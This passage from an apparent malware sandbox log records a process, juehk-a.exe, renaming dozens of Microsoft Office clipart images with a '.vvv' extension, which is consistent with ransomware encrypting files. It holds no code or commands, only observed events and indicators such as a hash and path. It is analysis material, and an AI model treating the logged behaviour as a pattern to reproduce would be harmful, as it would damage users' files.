31220.          sequenceNumber: 2199
31221.          filesize: 87230
31222.          processinfo:
31223.            pid: 1648
31224.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31225.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31226.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG
31227.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG.vvv
31228.            ads:
31229.          fid (ads:): 562949953498436
31230.          ntstatus: 0x0
31231.          CreateOptions: 0x0
31232.        file:
31233.          timestamp: 97388
31234.          mode: rename
31235.          sequenceNumber: 2200
31236.          filesize: 110302
31237.          processinfo:
31238.            pid: 1648
31239.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31240.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31241.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG
31242.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG.vvv
31243.            ads:
31244.          fid (ads:): 562949953498437
31245.          ntstatus: 0x0
31246.          CreateOptions: 0x0
31247.        file:
31248.          timestamp: 97402
31249.          mode: rename
31250.          sequenceNumber: 2201
31251.          filesize: 96894
31252.          processinfo:
31253.            pid: 1648
31254.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31255.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31256.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG
31257.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG.vvv
31258.            ads:
31259.          fid (ads:): 562949953498438
31260.          ntstatus: 0x0
31261.          CreateOptions: 0x0
31262.        file:
31263.          timestamp: 97418
31264.          mode: rename
31265.          sequenceNumber: 2202
31266.          filesize: 96494
31267.          processinfo:
31268.            pid: 1648
31269.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31270.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31271.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG
31272.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG.vvv
31273.            ads:
31274.          fid (ads:): 562949953498439
31275.          ntstatus: 0x0
31276.          CreateOptions: 0x0
31277.        file:
31278.          timestamp: 97431
31279.          mode: rename
31280.          sequenceNumber: 2203
31281.          filesize: 89118
31282.          processinfo:
31283.            pid: 1648
31284.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31285.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31286.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG
31287.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG.vvv
31288.            ads:
31289.          fid (ads:): 562949953498440
31290.          ntstatus: 0x0
31291.          CreateOptions: 0x0
31292.        file:
31293.          timestamp: 97446
31294.          mode: rename
31295.          sequenceNumber: 2204
31296.          filesize: 90510
31297.          processinfo:
31298.            pid: 1648
31299.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31300.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31301.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG
31302.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG.vvv
31303.            ads:
31304.          fid (ads:): 562949953498441
31305.          ntstatus: 0x0
31306.          CreateOptions: 0x0
31307.        file:
31308.          timestamp: 97461
31309.          mode: rename
31310.          sequenceNumber: 2205
31311.          filesize: 109454
31312.          processinfo:
31313.            pid: 1648
31314.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31315.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31316.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG
31317.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG.vvv
31318.            ads:
31319.          fid (ads:): 562949953498442
31320.          ntstatus: 0x0
31321.          CreateOptions: 0x0
31322.        file:
31323.          timestamp: 97503
31324.          mode: rename
31325.          sequenceNumber: 2206
31326.          filesize: 103822
31327.          processinfo:
31328.            pid: 1648
31329.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31330.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31331.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG
31332.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG.vvv
31333.            ads:
31334.          fid (ads:): 562949953498443
31335.          ntstatus: 0x0
31336.          CreateOptions: 0x0
31337.        file:
31338.          timestamp: 97518
31339.          mode: rename
31340.          sequenceNumber: 2207
31341.          filesize: 86318
31342.          processinfo:
31343.            pid: 1648
31344.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31345.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31346.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG
31347.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG.vvv
31348.            ads:
31349.          fid (ads:): 562949953498444
31350.          ntstatus: 0x0
31351.          CreateOptions: 0x0
31352.        file:
31353.          timestamp: 97532
31354.          mode: rename
31355.          sequenceNumber: 2208
31356.          filesize: 107934
31357.          processinfo:
31358.            pid: 1648
31359.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31360.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31361.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG
31362.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG.vvv
31363.            ads:
31364.          fid (ads:): 562949953498445
31365.          ntstatus: 0x0
31366.          CreateOptions: 0x0
31367.        file:
31368.          timestamp: 97548
31369.          mode: rename
31370.          sequenceNumber: 2209
31371.          filesize: 101486
31372.          processinfo:
31373.            pid: 1648
31374.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31375.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31376.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG
31377.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG.vvv
31378.            ads:
31379.          fid (ads:): 562949953498446
31380.          ntstatus: 0x0
31381.          CreateOptions: 0x0
31382.        file:
31383.          timestamp: 97565
31384.          mode: rename
31385.          sequenceNumber: 2210
31386.          filesize: 114846
31387.          processinfo:
31388.            pid: 1648
31389.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31390.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31391.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG
31392.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG.vvv
31393.            ads:
31394.          fid (ads:): 562949953498447
31395.          ntstatus: 0x0
31396.          CreateOptions: 0x0
31397.        file:
31398.          timestamp: 97579
31399.          mode: rename
31400.          sequenceNumber: 2211
31401.          filesize: 98190
31402.          processinfo:
31403.            pid: 1648
31404.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31405.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31406.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG
31407.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG.vvv
31408.            ads:
31409.          fid (ads:): 562949953498448
31410.          ntstatus: 0x0
31411.          CreateOptions: 0x0
31412.        file:
31413.          timestamp: 97596
31414.          mode: rename
31415.          sequenceNumber: 2212
31416.          filesize: 113838
31417.          processinfo:
31418.            pid: 1648
31419.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31420.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31421.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG
31422.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG.vvv
31423.            ads:
31424.          fid (ads:): 562949953498449
31425.          ntstatus: 0x0
31426.          CreateOptions: 0x0
31427.        file:
31428.          timestamp: 97611
31429.          mode: rename
31430.          sequenceNumber: 2213
31431.          filesize: 100910
31432.          processinfo:
31433.            pid: 1648
31434.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31435.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31436.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG
31437.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG.vvv
31438.            ads:
31439.          fid (ads:): 562949953498450
31440.          ntstatus: 0x0
31441.          CreateOptions: 0x0
31442.        file:
31443.          timestamp: 97627
31444.          mode: rename
31445.          sequenceNumber: 2214
31446.          filesize: 93870
31447.          processinfo:
31448.            pid: 1648
31449.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31450.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31451.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG
31452.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG.vvv
31453.            ads:
31454.          fid (ads:): 562949953498451
31455.          ntstatus: 0x0
31456.          CreateOptions: 0x0
31457.        file:
31458.          timestamp: 97642
31459.          mode: rename
31460.          sequenceNumber: 2215
31461.          filesize: 112894
31462.          processinfo:
31463.            pid: 1648
31464.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31465.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31466.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG
31467.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG.vvv
31468.            ads:
31469.          fid (ads:): 562949953498452
31470.          ntstatus: 0x0
31471.          CreateOptions: 0x0
31472.        file:
31473.          timestamp: 97656
31474.          mode: rename
31475.          sequenceNumber: 2216
31476.          filesize: 96574
31477.          processinfo:
31478.            pid: 1648
31479.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31480.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31481.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG
31482.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG.vvv
31483.            ads:
31484.          fid (ads:): 562949953498453
31485.          ntstatus: 0x0
31486.          CreateOptions: 0x0
31487.        file:
31488.          timestamp: 97672
31489.          mode: rename
31490.          sequenceNumber: 2217
31491.          filesize: 89406
31492.          processinfo:
31493.            pid: 1648
31494.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31495.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31496.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG
31497.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG.vvv
31498.            ads:
31499.          fid (ads:): 562949953498454
31500.          ntstatus: 0x0
31501.          CreateOptions: 0x0
31502.        file:
31503.          timestamp: 97685
31504.          mode: rename
31505.          sequenceNumber: 2218
31506.          filesize: 103054
31507.          processinfo:
31508.            pid: 1648
31509.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31510.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31511.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG
31512.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG.vvv
31513.            ads:
31514.          fid (ads:): 562949953498455
31515.          ntstatus: 0x0
31516.          CreateOptions: 0x0
31517.        file:
31518.          timestamp: 97699
31519.          mode: rename
31520.          sequenceNumber: 2219
31521.          filesize: 97566
31522.          processinfo:
31523.            pid: 1648
31524.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31525.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31526.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG
31527.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG.vvv
31528.            ads:
31529.          fid (ads:): 562949953498456
31530.          ntstatus: 0x0
31531.          CreateOptions: 0x0
31532.        file:
31533.          timestamp: 97713
31534.          mode: rename
31535.          sequenceNumber: 2220
31536.          filesize: 82398
31537.          processinfo:
31538.            pid: 1648
31539.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31540.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31541.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG
31542.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG.vvv
31543.            ads:
31544.          fid (ads:): 562949953498457
31545.          ntstatus: 0x0
31546.          CreateOptions: 0x0
31547.        file:
31548.          timestamp: 97741
31549.          mode: rename
31550.          sequenceNumber: 2221
31551.          filesize: 55966
31552.          processinfo:
31553.            pid: 1648
31554.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31555.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31556.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG
31557.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG.vvv
31558.            ads:
31559.          fid (ads:): 562949953498458
31560.          ntstatus: 0x0
31561.          CreateOptions: 0x0
31562.        file:
31563.          timestamp: 97753
31564.          mode: rename
31565.          sequenceNumber: 2222
31566.          filesize: 71982
31567.          processinfo:
31568.            pid: 1648
31569.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31570.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31571.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG
31572.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG.vvv
31573.            ads:
31574.          fid (ads:): 562949953498459
31575.          ntstatus: 0x0
31576.          CreateOptions: 0x0
31577.        file:
31578.          timestamp: 97765
31579.          mode: rename
31580.          sequenceNumber: 2223
31581.          filesize: 31262
31582.          processinfo:
31583.            pid: 1648
31584.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31585.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31586.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG
31587.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG.vvv
31588.            ads:
31589.          fid (ads:): 562949953498460
31590.          ntstatus: 0x0
31591.          CreateOptions: 0x0
31592.        file:
31593.          timestamp: 97779
31594.          mode: rename
31595.          sequenceNumber: 2224
31596.          filesize: 43710
31597.          processinfo:
31598.            pid: 1648
31599.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31600.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31601.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG
31602.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG.vvv
31603.            ads:
31604.          fid (ads:): 562949953498461
31605.          ntstatus: 0x0
31606.          CreateOptions: 0x0
31607.        file:
31608.          timestamp: 97794
31609.          mode: rename
31610.          sequenceNumber: 2225
31611.          filesize: 15598
31612.          processinfo:
31613.            pid: 1648
31614.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31615.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31616.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG
31617.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG.vvv
31618.            ads:
31619.          fid (ads:): 562949953498462
31620.          ntstatus: 0x0
31621.          CreateOptions: 0x0
31622.        file:
31623.          timestamp: 97807
31624.          mode: rename
31625.          sequenceNumber: 2226
31626.          filesize: 15118
31627.          processinfo:
31628.            pid: 1648
31629.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31630.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31631.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG
31632.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG.vvv
31633.            ads:
31634.          fid (ads:): 562949953498463
31635.          ntstatus: 0x0
31636.          CreateOptions: 0x0
31637.        file:
31638.          timestamp: 97821
31639.          mode: rename
31640.          sequenceNumber: 2227
31641.          filesize: 27358
31642.          processinfo:
31643.            pid: 1648
31644.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31645.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31646.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG
31647.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG.vvv
31648.            ads:
31649.          fid (ads:): 562949953498464
31650.          ntstatus: 0x0
31651.          CreateOptions: 0x0
31652.        file:
31653.          timestamp: 97836
31654.          mode: rename
31655.          sequenceNumber: 2228
31656.          filesize: 52398
31657.          processinfo:
31658.            pid: 1648
31659.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31660.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31661.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG
31662.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG.vvv
31663.            ads:
31664.          fid (ads:): 562949953498465
31665.          ntstatus: 0x0
31666.          CreateOptions: 0x0
31667.        file:
31668.          timestamp: 97850
31669.          mode: rename
31670.          sequenceNumber: 2229
31671.          filesize: 28302
31672.          processinfo:
31673.            pid: 1648
31674.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31675.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31676.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG
31677.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG.vvv
31678.            ads:
31679.          fid (ads:): 562949953498466
31680.          ntstatus: 0x0
31681.          CreateOptions: 0x0
31682.        file:
31683.          timestamp: 97864
31684.          mode: rename
31685.          sequenceNumber: 2230
31686.          filesize: 39534
31687.          processinfo:
31688.            pid: 1648
31689.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31690.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31691.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG
31692.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG.vvv
31693.            ads:
31694.          fid (ads:): 562949953498467
31695.          ntstatus: 0x0
31696.          CreateOptions: 0x0
31697.        file:
31698.          timestamp: 97879
31699.          mode: rename
31700.          sequenceNumber: 2231
31701.          filesize: 47966
31702.          processinfo:
31703.            pid: 1648
31704.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31705.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31706.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG
31707.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG.vvv
31708.            ads:
31709.          fid (ads:): 562949953498468
31710.          ntstatus: 0x0
31711.          CreateOptions: 0x0
31712.        file:
31713.          timestamp: 97893
31714.          mode: rename
31715.          sequenceNumber: 2232
31716.          filesize: 39566
31717.          processinfo:
31718.            pid: 1648
31719.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31720.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31721.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG
31722.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG.vvv
31723.            ads:
31724.          fid (ads:): 562949953498469
31725.          ntstatus: 0x0
31726.          CreateOptions: 0x0
31727.        file:
31728.          timestamp: 97907
31729.          mode: rename
31730.          sequenceNumber: 2233
31731.          filesize: 32670
31732.          processinfo:
31733.            pid: 1648
31734.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31735.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31736.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG
31737.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG.vvv
31738.            ads:
31739.          fid (ads:): 562949953498470
31740.          ntstatus: 0x0
31741.          CreateOptions: 0x0
31742.        file:
31743.          timestamp: 97920
31744.          mode: rename
31745.          sequenceNumber: 2234
31746.          filesize: 14014
31747.          processinfo:
31748.            pid: 1648
31749.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31750.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31751.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG
31752.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG.vvv
31753.            ads:
31754.          fid (ads:): 562949953498471
31755.          ntstatus: 0x0
31756.          CreateOptions: 0x0
31757.        file:
31758.          timestamp: 97937
31759.          mode: rename
31760.          sequenceNumber: 2235
31761.          filesize: 203310
31762.          processinfo:
31763.            pid: 1648
31764.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31765.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31766.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG
31767.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG.vvv
31768.            ads:
31769.          fid (ads:): 562949953498472
31770.          ntstatus: 0x0
31771.          CreateOptions: 0x0
31772.        file:
31773.          timestamp: 97952
31774.          mode: rename
31775.          sequenceNumber: 2236
31776.          filesize: 89838
31777.          processinfo:
31778.            pid: 1648
31779.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31780.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31781.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG
31782.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG.vvv
31783.            ads:
31784.          fid (ads:): 562949953498473
31785.          ntstatus: 0x0
31786.          CreateOptions: 0x0
31787.        file:
31788.          timestamp: 97969
31789.          mode: rename
31790.          sequenceNumber: 2237
31791.          filesize: 125406
31792.          processinfo:
31793.            pid: 1648
31794.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31795.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31796.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG
31797.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG.vvv
31798.            ads:
31799.          fid (ads:): 562949953498474
31800.          ntstatus: 0x0
31801.          CreateOptions: 0x0
31802.        file:
31803.          timestamp: 97983
31804.          mode: rename
31805.          sequenceNumber: 2238
31806.          filesize: 105470
31807.          processinfo:
31808.            pid: 1648
31809.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31810.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31811.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG
31812.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG.vvv
31813.            ads:
31814.          fid (ads:): 562949953498475
31815.          ntstatus: 0x0
31816.          CreateOptions: 0x0
31817.        file:
31818.          timestamp: 97996
31819.          mode: rename
31820.          sequenceNumber: 2239
31821.          filesize: 96494
31822.          processinfo:
31823.            pid: 1648
31824.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31825.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31826.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG
31827.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG.vvv
31828.            ads:
31829.          fid (ads:): 562949953498476
31830.          ntstatus: 0x0
31831.          CreateOptions: 0x0
31832.        file:
31833.          timestamp: 98035
31834.          mode: rename
31835.          sequenceNumber: 2240
31836.          filesize: 136030
31837.          processinfo:
31838.            pid: 1648
31839.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31840.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31841.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG
31842.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG.vvv
31843.            ads:
31844.          fid (ads:): 562949953498991
31845.          ntstatus: 0x0
31846.          CreateOptions: 0x0
31847.        file:
31848.          timestamp: 98047
31849.          mode: rename
31850.          sequenceNumber: 2241
31851.          filesize: 41902
31852.          processinfo:
31853.            pid: 1648
31854.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31855.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31856.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG
31857.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG.vvv
31858.            ads:
31859.          fid (ads:): 562949953498992
31860.          ntstatus: 0x0
31861.          CreateOptions: 0x0
31862.        file:
31863.          timestamp: 98058
31864.          mode: rename
31865.          sequenceNumber: 2242
31866.          filesize: 6750
31867.          processinfo:
31868.            pid: 1648
31869.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31870.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31871.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG
31872.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG.vvv
31873.            ads:
31874.          fid (ads:): 562949953498993
31875.          ntstatus: 0x0
31876.          CreateOptions: 0x0
31877.        file:
31878.          timestamp: 98070
31879.          mode: rename
31880.          sequenceNumber: 2243
31881.          filesize: 7742
31882.          processinfo:
31883.            pid: 1648
31884.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31885.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31886.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG
31887.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG.vvv
31888.            ads:
31889.          fid (ads:): 562949953498994
31890.          ntstatus: 0x0
31891.          CreateOptions: 0x0
31892.        file:
31893.          timestamp: 98081
31894.          mode: rename
31895.          sequenceNumber: 2244
31896.          filesize: 6414
31897.          processinfo:
31898.            pid: 1648
31899.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31900.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31901.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG
31902.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG.vvv
31903.            ads:
31904.          fid (ads:): 562949953498997
31905.          ntstatus: 0x0
31906.          CreateOptions: 0x0
31907.        file:
31908.          timestamp: 98093
31909.          mode: rename
31910.          sequenceNumber: 2245
31911.          filesize: 40030
31912.          processinfo:
31913.            pid: 1648
31914.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31915.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31916.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG
31917.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG.vvv
31918.            ads:
31919.          fid (ads:): 562949953499005
31920.          ntstatus: 0x0
31921.          CreateOptions: 0x0
31922.        file:
31923.          timestamp: 98110
31924.          mode: rename
31925.          sequenceNumber: 2246
31926.          filesize: 18110
31927.          processinfo:
31928.            pid: 1648
31929.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31930.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31931.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG
31932.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG.vvv
31933.            ads:
31934.          fid (ads:): 562949953499006
31935.          ntstatus: 0x0
31936.          CreateOptions: 0x0
31937.        file:
31938.          timestamp: 98122
31939.          mode: rename
31940.          sequenceNumber: 2247
31941.          filesize: 27806
31942.          processinfo:
31943.            pid: 1648
31944.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31945.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31946.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG
31947.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG.vvv
31948.            ads:
31949.          fid (ads:): 562949953499009
31950.          ntstatus: 0x0
31951.          CreateOptions: 0x0
31952.        file:
31953.          timestamp: 98133
31954.          mode: rename
31955.          sequenceNumber: 2248
31956.          filesize: 29758
31957.          processinfo:
